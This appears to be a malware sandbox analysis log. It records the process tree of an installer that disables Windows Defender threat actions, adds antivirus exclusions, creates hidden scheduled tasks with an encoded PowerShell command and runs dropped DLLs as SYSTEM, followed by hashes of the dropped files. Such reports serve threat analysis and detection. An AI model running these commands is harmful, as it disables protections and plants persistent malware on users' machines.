C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GRdwjAGSaHbU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GRdwjAGSaHbU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JlANBNwtXkrgC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JlANBNwtXkrgC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PIAiHDebRQmhprJxqbR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PIAiHDebRQmhprJxqbR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VKMQhPdtjiUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VKMQhPdtjiUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yDqFPnIeU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yDqFPnIeU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\RPguJxSuNaFIZdVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\RPguJxSuNaFIZdVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\OjMvmTgzssfiXiGwf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\OjMvmTgzssfiXiGwf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MVUDcXCMdfDwUXap\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MVUDcXCMdfDwUXap\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GRdwjAGSaHbU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GRdwjAGSaHbU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GRdwjAGSaHbU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JlANBNwtXkrgC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JlANBNwtXkrgC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PIAiHDebRQmhprJxqbR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PIAiHDebRQmhprJxqbR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VKMQhPdtjiUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VKMQhPdtjiUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yDqFPnIeU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yDqFPnIeU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\RPguJxSuNaFIZdVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\RPguJxSuNaFIZdVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\OjMvmTgzssfiXiGwf /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\OjMvmTgzssfiXiGwf /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MVUDcXCMdfDwUXap /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MVUDcXCMdfDwUXap /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvBQAziYI" /SC once /ST 13:04:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvBQAziYI"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvBQAziYI"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZgxYrmkCaIygifaWS" /SC once /ST 03:31:51 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MVUDcXCMdfDwUXap\JyihuQCrYXOItlv\RHBIkat.exe\" 64 /site_id 757674 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZgxYrmkCaIygifaWS"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\MVUDcXCMdfDwUXap\JyihuQCrYXOItlv\RHBIkat.exeC:\Windows\Temp\MVUDcXCMdfDwUXap\JyihuQCrYXOItlv\RHBIkat.exe 64 /site_id 757674 /S1⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bFZpgwNlQHGZXuKxuE"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yDqFPnIeU\vWWVJE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "izXVUyiFnrCcvNJ" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "izXVUyiFnrCcvNJ2" /F /xml "C:\Program Files (x86)\yDqFPnIeU\lduYxlS.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "izXVUyiFnrCcvNJ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "izXVUyiFnrCcvNJ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uLbXQvIEAWUXqZ" /F /xml "C:\Program Files (x86)\GRdwjAGSaHbU2\VJxgvze.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uCikAnjSGNabk2" /F /xml "C:\ProgramData\RPguJxSuNaFIZdVB\tYenmAV.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DEOuHhazvsWGfAttn2" /F /xml "C:\Program Files (x86)\PIAiHDebRQmhprJxqbR\xDouKjm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uTWGzwaJQnskbBFIMbJ2" /F /xml "C:\Program Files (x86)\JlANBNwtXkrgC\QWbimQK.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cixcSTkjmjQQwhCFD" /SC once /ST 03:25:24 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MVUDcXCMdfDwUXap\fjcppEaC\eDWtwDO.dll\",#1 /site_id 757674" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cixcSTkjmjQQwhCFD"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZgxYrmkCaIygifaWS"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 2284 -ip 22841⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MVUDcXCMdfDwUXap\fjcppEaC\eDWtwDO.dll",#1 /site_id 7576741⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MVUDcXCMdfDwUXap\fjcppEaC\eDWtwDO.dll",#1 /site_id 7576742⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cixcSTkjmjQQwhCFD"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 2284 -ip 22841⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\HDNGURU LLF Tool\LLFTOOL.EXEFilesize
4.5MB
MD5b6a51210a3273db0decb82d0179eaf5c
SHA11d0005db246e751287190d3ed8ccfb6e88aceea9
SHA2567dc7d56eb684bb7fdcd0bc0e2d431d69f4ce159b381bb72264e3a775bb74f0d5
SHA512edbf53055b84f989d911c24b3cac0093a4b1bb52aaa3e241bc0d4547c381650e3e93695f9b2af5d9e6b0990a87e6f2aa445d7ac224b2ec1cfcf8cc22893bbea9
-
C:\Program Files (x86)\HDNGURU LLF Tool\LLFTOOL.exeFilesize
4.5MB
MD5b6a51210a3273db0decb82d0179eaf5c
SHA11d0005db246e751287190d3ed8ccfb6e88aceea9
SHA2567dc7d56eb684bb7fdcd0bc0e2d431d69f4ce159b381bb72264e3a775bb74f0d5
SHA512edbf53055b84f989d911c24b3cac0093a4b1bb52aaa3e241bc0d4547c381650e3e93695f9b2af5d9e6b0990a87e6f2aa445d7ac224b2ec1cfcf8cc22893bbea9
-
C:\Program Files (x86)\PES Disk Master\pes58.exeFilesize
4.4MB
MD51f0fb255b7628b01438771fc729499ff
SHA11c381b9fc14111e9dc50d533309100227e8aa071
SHA2566c14d5840f2247214c68273dff9010dd8068b5f2bbdeea0d1dcff12c2737df4d
SHA51227482d86ff48df5e0765c3ea2961d9587c4bb351d551e949cbe9c892f6470940de87ee67fdccd54b4c01c0b7becd85610a7abe1f60d8e847f035351d5016d0aa
-
C:\Program Files (x86)\PES Disk Master\pes58.exeFilesize
4.4MB
MD51f0fb255b7628b01438771fc729499ff
SHA11c381b9fc14111e9dc50d533309100227e8aa071
SHA2566c14d5840f2247214c68273dff9010dd8068b5f2bbdeea0d1dcff12c2737df4d
SHA51227482d86ff48df5e0765c3ea2961d9587c4bb351d551e949cbe9c892f6470940de87ee67fdccd54b4c01c0b7becd85610a7abe1f60d8e847f035351d5016d0aa
-
C:\Program Files (x86)\Proxy2Service\client.exeFilesize
4.1MB
MD5cbe72c4c3573e81e2b5a1d8363327504
SHA12a99f4bc5b2d48d6776b3c47cd1cfba107d8eded
SHA25619edd6c4c7728289eaf3e6efea4c057e4585886b5c58b606d8ec3ca7eb91a084
SHA512caa1a60e4e380d2e94919a0bc8dad33e13a469e593a6e21ce9f20f7a24e23b0b2ff94845ec85c14dcef86a06d7999f87326a7839e32e61de023481cab28ddb4b
-
C:\Program Files (x86)\Proxy2Service\client.exeFilesize
4.1MB
MD5cbe72c4c3573e81e2b5a1d8363327504
SHA12a99f4bc5b2d48d6776b3c47cd1cfba107d8eded
SHA25619edd6c4c7728289eaf3e6efea4c057e4585886b5c58b606d8ec3ca7eb91a084
SHA512caa1a60e4e380d2e94919a0bc8dad33e13a469e593a6e21ce9f20f7a24e23b0b2ff94845ec85c14dcef86a06d7999f87326a7839e32e61de023481cab28ddb4b
-
C:\Program Files (x86)\Syney\PCCleaner\PCCleaner.exeFilesize
9.4MB
MD55bef7d0b672a3c1e4d0a8788df0d15fa
SHA136a2264048fafb4629c333a50010513fa4fad088
SHA2562f28f7fe11f04dd29aed3578c6ff959f6ff89ea5523511f372a0676cfbbd9f75
SHA51273131d123a94ca676ea5fe012d202a0910cf10467d306dc3594fbeb3a0411e9767577b198b47ae470a1db21321d4c5b5e70a09e12e6a9c8baab8c854ef6dc083
-
C:\Program Files (x86)\Syney\PCCleaner\PCCleaner.exeFilesize
9.4MB
MD55bef7d0b672a3c1e4d0a8788df0d15fa
SHA136a2264048fafb4629c333a50010513fa4fad088
SHA2562f28f7fe11f04dd29aed3578c6ff959f6ff89ea5523511f372a0676cfbbd9f75
SHA51273131d123a94ca676ea5fe012d202a0910cf10467d306dc3594fbeb3a0411e9767577b198b47ae470a1db21321d4c5b5e70a09e12e6a9c8baab8c854ef6dc083
-
C:\Program Files (x86)\Syney\PCCleaner\TurboSearch.exeFilesize
916KB
MD5673eb9ccb025433f0b61f60d022b3f6a
SHA1876d40af1a7775dbe2e2493d9acad3fa66574b10
SHA2566b40bb166e9c341928087d5ab2f185ec0d180a1ac8b7a1c1a14812a069a02821
SHA51256492aff44976fd13f9668d6944c03e773c2fa345706b1a7808fc3122828e9ed87b5e95030b19b46ee3f8d666cb614fe5cee95b18b3462eac512af33e4ea560d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\CookiesFilesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure PreferencesFilesize
30KB
MD5565957cafd141bd1f6ab63665cf74f2a
SHA10b983d3b8a99d16dd4c1ea84d7a6e52206e5cf93
SHA256490e758ca5f4d4f8ca86f1709fc81eb6430208dc848356c9850a476d89c08c39
SHA51266fc81e4435b3158fa09963c17b2f35164d15fcb7446fbe5ddaee6099b2438397559dc777bf8a5c603643f5ebd3c61376c04fd8f42899fe1bd3208ccdea3bfac
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
9KB
MD5a766f0782d6dff6bc40a0caabc7527ae
SHA19761dedbd26d187be0ba412fa5bbc7ef449f2b85
SHA256bc53fb663e49ecab3aa9016548652ed374234bbd91b4f3776625d0cae3d97727
SHA512975f9618b760ad6f3d81644238a6ebc8c99736a76ac359f1bb36eeae223f431019fb0ee2aa91d1857839b1927098fb5b9dbb378daf4d53bcf04528c688fcaa5b
-
C:\Users\Admin\AppData\Local\Temp\6N4e2ZUU\Veqib9DWAp2jG8JUN0.exeFilesize
2.6MB
MD55e079996c2d69a663c9bd9b47cbc9727
SHA1dc25afa02200d30ddaed00b6c570a00c09bd2ce5
SHA2568013630fb93615be59b4161f2f50583242c7402504640786f8399a5cceefb931
SHA51224cf769924d66058e616f1196389c3cee1ac1c24b13a59fc4f19e667adf3823d43575c7f5543b0836f40a31137d6ee225fb96c661bd493ed3252472b760fe3d2
-
C:\Users\Admin\AppData\Local\Temp\6N4e2ZUU\Veqib9DWAp2jG8JUN0.exeFilesize
2.6MB
MD55e079996c2d69a663c9bd9b47cbc9727
SHA1dc25afa02200d30ddaed00b6c570a00c09bd2ce5
SHA2568013630fb93615be59b4161f2f50583242c7402504640786f8399a5cceefb931
SHA51224cf769924d66058e616f1196389c3cee1ac1c24b13a59fc4f19e667adf3823d43575c7f5543b0836f40a31137d6ee225fb96c661bd493ed3252472b760fe3d2
-
C:\Users\Admin\AppData\Local\Temp\7zS7EDF.tmp\Install.exeFilesize
6.3MB
MD59c27fd2f8adba3d1464892671c848333
SHA177918a4a445f050bdf69563d4b2c4e59ec58f4a8
SHA256a53badf865e409aacab6bc0f8ed5b983336e8db51550003b43d7de05f847bb80
SHA5125cd3091103298825b38fdfb4c320313af2cfff23c9869652608aa1d81a5fddbdd096994740127acc673f7555fdbf24fd5c9b4ca22624dbe3542505ac4a4d7d0a
-
C:\Users\Admin\AppData\Local\Temp\7zS7EDF.tmp\Install.exeFilesize
6.3MB
MD59c27fd2f8adba3d1464892671c848333
SHA177918a4a445f050bdf69563d4b2c4e59ec58f4a8
SHA256a53badf865e409aacab6bc0f8ed5b983336e8db51550003b43d7de05f847bb80
SHA5125cd3091103298825b38fdfb4c320313af2cfff23c9869652608aa1d81a5fddbdd096994740127acc673f7555fdbf24fd5c9b4ca22624dbe3542505ac4a4d7d0a
-
C:\Users\Admin\AppData\Local\Temp\7zS8884.tmp\Install.exeFilesize
6.8MB
MD52241420aced7ba99e51c64ad049548ab
SHA1473dfa49fff67ab8a306ba055d40e0f0e0074749
SHA25671b53e059ef1fca8c1ecf1d75c6d2e9a560f0a3ec8f2b4a52dbd64c0797d5a06
SHA51292c8eb92103e446f1255a40d8fe2b79e35ac53359998985a592ed4eb2903977a2492db2e02310545971ac9d912001280d6e9ccc2f7a28c613b91b76c1c3af385
-
C:\Users\Admin\AppData\Local\Temp\7zS8884.tmp\Install.exeFilesize
6.8MB
MD52241420aced7ba99e51c64ad049548ab
SHA1473dfa49fff67ab8a306ba055d40e0f0e0074749
SHA25671b53e059ef1fca8c1ecf1d75c6d2e9a560f0a3ec8f2b4a52dbd64c0797d5a06
SHA51292c8eb92103e446f1255a40d8fe2b79e35ac53359998985a592ed4eb2903977a2492db2e02310545971ac9d912001280d6e9ccc2f7a28c613b91b76c1c3af385
-
C:\Users\Admin\AppData\Local\Temp\IMBApL2G\c43rIfm3KgY4PiV.exeFilesize
405KB
MD57731cf5b42c4e5a7bf5859240bbcabd9
SHA1881ecf093dd8241b664cfc7521a9351dc8d9cf7c
SHA256a3f18ccd375dc30af943b517597e4e7f7ed668aa6f711b807891d7225d11bd10
SHA512cc1b3a89706660d4fa616243facfd682456a0e875d82d1ac62b8805f35bde672463e89fad0ffe77bbe915884e2e24511de9688b74097551e1e9b54d421fe3281
-
C:\Users\Admin\AppData\Local\Temp\IMBApL2G\c43rIfm3KgY4PiV.exeFilesize
405KB
MD57731cf5b42c4e5a7bf5859240bbcabd9
SHA1881ecf093dd8241b664cfc7521a9351dc8d9cf7c
SHA256a3f18ccd375dc30af943b517597e4e7f7ed668aa6f711b807891d7225d11bd10
SHA512cc1b3a89706660d4fa616243facfd682456a0e875d82d1ac62b8805f35bde672463e89fad0ffe77bbe915884e2e24511de9688b74097551e1e9b54d421fe3281
-
C:\Users\Admin\AppData\Local\Temp\JhCdhHbm\g8soNXAr8ZzH9E8K.exeFilesize
7.3MB
MD526339d2e50b6f2129d0e3b3bbd56e028
